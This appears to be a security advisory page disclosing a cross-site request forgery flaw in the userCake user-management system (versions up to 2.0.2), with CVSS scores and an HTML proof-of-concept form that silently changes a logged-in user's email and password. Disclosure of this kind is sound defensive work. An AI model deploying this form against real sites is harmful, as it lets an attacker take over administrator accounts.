userCake <=2.0.2 Cross-Site Request Forgery vulnerability

2014-05-26 / 2014-05-27
Credit: Dolev Farhi
Risk: Low
Local: No
Remote: Yes
CWE: CWE-352


Ogólna skala CVSS: 6.8/10
Znaczenie: 6.4/10
Łatwość wykorzystania: 8.6/10
Wymagany dostęp: Zdalny
Złożoność ataku: Średnia
Autoryzacja: Nie wymagana
Wpływ na poufność: Częściowy
Wpływ na integralność: Częściowy
Wpływ na dostępność: Częściowy

# Exploit Title: Cross-Site Request Forgery vulnerability # Software: userCake # Software Link: http://usercake.com/downloads/userCakeV2.0.2.zip # Version: <=2.0.2 # Author: Dolev Farhi; dolev(at)openflare(dot)org # Date: 24.5.2014 # Tested on: Kali Linux # Vendor homepage: usercake.com # Vendor alert date: 23.5.2014 1. About the application: Usercake's goal is to provide a secure user management system which can easily be adapted to any project's needs. It is cleanly written, well documented and easily modified. It comes with a strong backbone of tools and functions necessary for user management and has an active community of developers and enthusiasts able to provide support for your project. 2. Vulnerability Description: userCake lacks session tokens making it vulnerable to cross-site request forgery attacks (CSRF). an attacker can easily change administrator password and email. 3. Exploit / Proof of concept <html> <! -- CSRF Example for userCake --> <div align="center"> <pre> <h2><b> userCake CSRF Proof of concept <b></h2> <h4> Prerequisite: Make sure the user is logged in to the forum before submitting </h4> <body> <form action="http://usercake.com/user_settings.php" method="POST"> Enter <u>CSRFTest</u> user account password to continue... Username: <b>CSRFTest</b> Password: <input type="password" name="password" size="10" required> <input type="hidden" name="email" value="attacker@email.com" /> <input type="hidden" name="passwordc" value="HelloWorld" /> <input type="hidden" name="passwordcheck" value="HelloWorld" /> <input type="submit" name="submit" value="Submit" /> </form> </body> </div> </html>


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top